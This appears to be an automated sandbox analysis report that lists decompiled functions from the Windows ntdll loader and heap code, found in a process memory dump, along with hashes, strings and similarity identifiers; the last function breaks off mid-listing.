Opcode Fuzzy Hash: 6b8a09ebc1545ded3625b9bd43ca90b469d7d2b3f4b6f30f8ee04ade257b3210
Instruction Fuzzy Hash: B9413C32E003159EDB316B88CC59B79B3B2BB013A4F0D856BD44457391EF749D81ABC1

Uniqueness

Uniqueness Score: -1.00%

Function 010649A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01064A4A, 01064A5D, 01064A5F, 01064AC4
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 01064A61
This is located in the %s field of the heap header., xrefs: 01064AD6
HEAP[%wZ]: , xrefs: 01064A3D, 01064AB7

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: 94aef1a1066220dc29a384d05217f3d128e1ac106ef23809e84db17d3007517a
Instruction ID: 1613273885c12362803f3666d571c0c26afbb0a68814ed540f77bfd284e0499b
Opcode Fuzzy Hash: 94aef1a1066220dc29a384d05217f3d128e1ac106ef23809e84db17d3007517a
Instruction Fuzzy Hash: 4B31DC31200204FFD721DB58C886FAA77ECEB05720F1442A6F545DB2A2E778A840EB69

Uniqueness

Uniqueness Score: -1.00%

Function 00FB8794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00FB8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E00FB934A() != 0) {
								_t159 = E0102A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1095780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01025510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1095780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E00FB849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E00FB8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E00FB8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1095c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1095c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E00FC2280(_t92, 0x10986cc);
															_t94 = E01079DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E00FD61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1095c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E00FB8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1095c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1095c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E00FEF380(_t136, 0xf81184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E00FC2280(_t108, 0x10986cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E00FD61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01079D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E00FBFFB0(_t118, _t156, 0x10986cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E00FE9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x00fb8799
0x00fb879d
0x00fb87a1
0x00fb87a3
0x00fb87a8
0x00fb87c3
0x00fb87c3
0x00fb87c8
0x00fb87d1
0x00fb87d4
0x00fb87d8
0x00fb87e5
0x00fb87ec
0x01009bfe
0x01009c00
0x01009c02
0x01009c08
0x01009c0d
0x01009c0f
0x01009c14
0x01009c2d
0x01009c32
0x01009c37
0x01009c3a
0x01009c3c
0x01009c42
0x01009c42
0x01009c3c
0x01009c02
0x00fb87da
0x00fb87df
0x00fb87e3
0x00000000
0x00000000
0x00fb87e3
0x00fb87f2
0x00000000
0x00fb87fb
0x00fb87fd
0x00fb87fe
0x00fb880e
0x00fb880f
0x00fb8810
0x00fb8814
0x00fb881a
0x00fb881c
0x00fb881f
0x00fb8821
0x00fb8822
0x00fb8824
0x00fb8826
0x00fb882c
0x00fb882e
0x01009c48
0x01009c48
0x00fb8834
0x00fb8834
0x00fb8837
0x00000000
0x00000000
0x00fb8837
0x00fb882e
0x00fb883d
0x00fb8840
0x00fb8843
0x00fb8846
0x00fb8849
0x00fb884c
0x00fb884e
0x00fb8850
0x00fb8852
0x00fb8854
0x00fb8857
0x00fb88b4
0x00fb88b6
0x00fb88b6
0x00fb8859
0x00fb8859
0x00fb8859
0x00fb8861
0x00fb8866
0x00fb886a
0x00fb893d
0x00fb8941
0x00000000
0x00fb8947
0x00fb8947
0x00fb894a
0x00fb894c
0x00000000
0x00fb8952
0x00fb8955
0x00fb895a
0x00fb895d
0x00fb895d
0x00fb895f
0x00fb8961
0x00fb8961
0x00fb8968
0x00000000
0x00000000
0x00fb896a
0x00fb896b
0x00fb896e
0x00000000
0x00fb8970
0x00fb8970
0x00fb8970
0x00fb8970
0x00fb8972
0x00fb8972
0x00fb8974
0x00000000
0x00fb897a
0x00fb897a
0x00fb897d
0x00000000
0x00fb8983
0x01009c65
0x01009c6d
0x01009c72
0x01009c75
0x01009c75
0x01009c82
0x01009c86
0x01009c87
0x01009c88
0x01009c89
0x01009c8c
0x01009c90
0x01009c95
0x01009c97
0x01009ca0
0x01009ca3
0x01009ca9
0x01009ca9
0x00000000
0x01009ca9
0x01009ca3
0x00000000
0x01009c97
0x00fb897d
0x00000000
0x00fb8974
0x00fb8988
0x00fb8992
0x00fb8996
0x00000000
0x00fb8996
0x00fb894c
0x00000000
0x00fb8870
0x00fb887b
0x00fb887d
0x00fb887f
0x00fb8881
0x00fb8884
0x00fb8884
0x00fb8886
0x00fb8889
0x00fb888c
0x00fb888e
0x00fb8891
0x00fb8891
0x00fb8898
0x00000000
0x00000000
0x00fb889a
0x00fb889b
0x00fb889e
0x00000000
0x00000000
0x00fb88a0
0x00fb88a8
0x00fb88b0
0x00fb88b2
0x00fb88d3
0x00fb88d5
0x00000000
0x00fb88d7
0x00fb88db
0x00fb88dc
0x00fb88e0
0x00fb88e8
0x00fb88ee
0x00fb88f0
0x00fb88f3
0x00fb88fc
0x00fb8901
0x00fb8906
0x00fb890c
0x00fb890c
0x00fb890f
0x00fb8916
0x00fb8917
0x00fb8918
0x00fb8919
0x00fb891a
0x00fb891f
0x00fb8921
0x01009c52
0x01009c55
0x01009c5b
0x01009cac
0x01009cc0
0x01009cc0
0x01009c55
0x00fb8927
0x00fb8927
0x00fb892f
0x00fb8933
0x00000000
0x00fb88f5
0x00fb88f5
0x00000000
0x00fb88f7
0x00fb88f7
0x00fb88fa
0x00000000
0x00000000
0x00000000
0x00000000
0x00fb88fa
0x00fb88f5
0x00fb88f3
0x00000000
0x00fb88d5
0x00000000
0x00fb88b2
0x00fb88c9
0x00000000
0x00fb88c9
0x00fb887f
0x00fb886a
0x00fb8857
0x00fb8852
0x00fb88bf
0x00fb88bf
0x00fb87aa
0x00fb87ad
0x00fb87ae
0x00fb87b4
0x00fb87b5
0x00fb87b6
0x00fb87b8
0x00fb87bd
0x00fb87c1
0x00fb87f4
0x00fb87fa
0x00000000
0x00000000
0x00000000
0x00fb87c1
0x00000000

Strings

LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01009C18
LdrpDoPostSnapWork, xrefs: 01009C1E
minkernel\ntdll\ldrsnap.c, xrefs: 01009C28

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 5d2d8a1c3326b95a04423e97e6d67e0937e689ecace1816e0ec22afecb5b2449
Instruction ID: 2a3489585acd431fd8d2665ec003f40e4565beeec527b04338c919fed55219aa
Opcode Fuzzy Hash: 5d2d8a1c3326b95a04423e97e6d67e0937e689ecace1816e0ec22afecb5b2449
Instruction Fuzzy Hash: EF91D071A0021A9BDF18DF5AC881AFAB3B9FF84354B544169E945AB241DF31ED02EF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FB7E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00FB7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E00FBCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E00FAC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1095780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01025510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1095780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E00FC7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00FC7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01027016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E00FC7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00FC7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01027016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E00FDA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E00FAB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x00fb7e4c
0x00fb7e50
0x00fb7e55
0x00fb7e58
0x00fb7e5d
0x00fb7e71
0x00fb7f33
0x00fb7e77
0x00fb7e77
0x00fb7e79
0x00fb7e79
0x00fb7e7e
0x00fb7f45
0x01009848
0x00000000
0x01009848
0x00fb7f4e
0x00fb7f53
0x00fb7f5a
0x00000000
0x00000000
0x0100985a
0x01009862
0x01009866
0x00000000
0x0100986c
0x00000000
0x0100986c
0x00fb7e84
0x00fb7e84
0x00fb7e8d
0x01009871
0x00fb7eb8
0x00fb7ec0
0x00fb7ec0
0x00fb7e9a
0x0100987e
0x00000000
0x00000000
0x01009884
0x0100988b
0x010098a7
0x010098ac
0x010098b1
0x010098b6
0x010098b8
0x010098b8
0x010098b9
0x00000000
0x010098b9
0x00fb7ea0
0x00fb7ea7
0x00000000
0x00000000
0x00fb7eac
0x00fb7eb1
0x00fb7ec6
0x00fb7ed0
0x010098cc
0x00fb7ed6
0x00fb7ed6
0x00fb7ed6
0x00fb7ede
0x00fb7ee3
0x010098e3
0x010098f0
0x01009902
0x010098f2
0x010098fb
0x010098fb
0x01009907
0x0100991d
0x0100991d
0x01009907
0x010098e3
0x00fb7ef0
0x00fb7f14
0x00fb7f14
0x00fb7f1e
0x01009946
0x00fb7f24
0x00fb7f24
0x00fb7f24
0x00fb7f2c
0x0100996a
0x01009975
0x01009975
0x0100997e
0x01009993
0x01009993
0x0100997e
0x00000000
0x00fb7ef2
0x00fb7efc
0x00fb7f0a
0x00fb7f0e
0x01009933
0x00000000
0x01009933
0x00000000
0x00fb7f0e
0x00000000
0x00000000
0x00000000
0x00fb7eb1

Strings

LdrpCompleteMapModule, xrefs: 01009898
minkernel\ntdll\ldrmap.c, xrefs: 010098A2
Could not validate the crypto signature for DLL %wZ, xrefs: 01009891

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: ef40678f40ae1d482164a5d6193d14ec894550c86d6c09ac599c56aee76e664c
Instruction ID: acf1725d5267e8c647dfa5603b215e5e11165bd70e90ab2f0e69bd3cdc22ba5c
Opcode Fuzzy Hash: ef40678f40ae1d482164a5d6193d14ec894550c86d6c09ac599c56aee76e664c
Instruction Fuzzy Hash: 37512531A08741DBE722EB5DC984BAABBE0AF84314F140599E9959B3D2C734ED00EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FAE620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00FAE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E00FAF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E00FE95D0();
						}
						if(_t78 != 0) {
							L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E00FEFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E00FEBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E00FE9600();
					if(_t97 < 0) {
						goto L6;
					}
					E00FEBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L00FAF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E00FEBB40(_t83, _t102 + 0x24, _t78);
								if(L00FB43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E00FEBB40(_t84, _t102 + 0x24, _t94);
									if(L00FB43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x00fae620
0x00fae628
0x00fae62f
0x00fae631
0x00fae635
0x00fae637
0x00fae63e
0x01005503
0x01005503
0x00fae64c
0x00fae64c
0x00fae651
0x00000000
0x00000000
0x00fae661
0x00fae665
0x0100542a
0x00fae715
0x00fae71a
0x00fae71c
0x00fae720
0x00fae720
0x00fae727
0x00fae736
0x00fae736
0x00fae743
0x00fae743
0x00fae673
0x00fae678
0x00fae67d
0x00fae682
0x00fae685
0x00fae692
0x00fae69b
0x00fae6a3
0x00fae6ad
0x00fae6b1
0x00fae6b2
0x00fae6bb
0x00fae6bf
0x00fae6c0
0x00fae6c8
0x00fae6cc
0x00fae6d5
0x00fae6d9
0x00000000
0x00000000
0x00fae6e5
0x00fae6ea
0x00fae6f9
0x00fae70b
0x00fae70f
0x01005439
0x0100545e
0x0100545e
0x00000000
0x0100545e
0x0100543b
0x0100543e
0x01005440
0x01005445
0x01005472
0x01005475
0x0100548d
0x01005493
0x010054a9
0x00000000
0x00000000
0x010054ab
0x010054b4
0x010054bc
0x010054c8
0x010054de
0x010054fb
0x010054e0
0x010054e6
0x010054eb
0x010054eb
0x010054de
0x00000000
0x010054bc
0x01005477
0x0100547a
0x01005480
0x01005483
0x01005486
0x0100548b
0x00000000
0x00000000
0x00000000
0x0100548b
0x00000000
0x00000000
0x00000000
0x00000000
0x01005447
0x01005447
0x01005447
0x01005447
0x0100544e
0x00000000
0x00000000
0x01005450
0x01005452
0x01005455
0x0100545a
0x00000000
0x00000000
0x00000000
0x0100545c
0x0100546a
0x0100546d
0x0100546f
0x00000000
0x0100546f
0x00fae70f

Strings

@, xrefs: 00FAE6C0
InstallLanguageFallback, xrefs: 00FAE6DB
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00FAE68C

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: d2b0c05d6d6f31b4d6220a3e499089892b6ee3539664094ccd300edb5a670752
Instruction ID: 1616886daf6eeae740c0f4ab4585d8a1268a96a7dfa6dc95fed3919d72bb64ab
Opcode Fuzzy Hash: d2b0c05d6d6f31b4d6220a3e499089892b6ee3539664094ccd300edb5a670752
Instruction Fuzzy Hash: EC51D2B25083469BD711DF28C840BABB3E8BF89714F05096EF985D7291FB34D904DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0106E539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0106E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0106BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0106BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0106AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E00FE9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0106A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0106A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E00FE9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0106A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0106A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
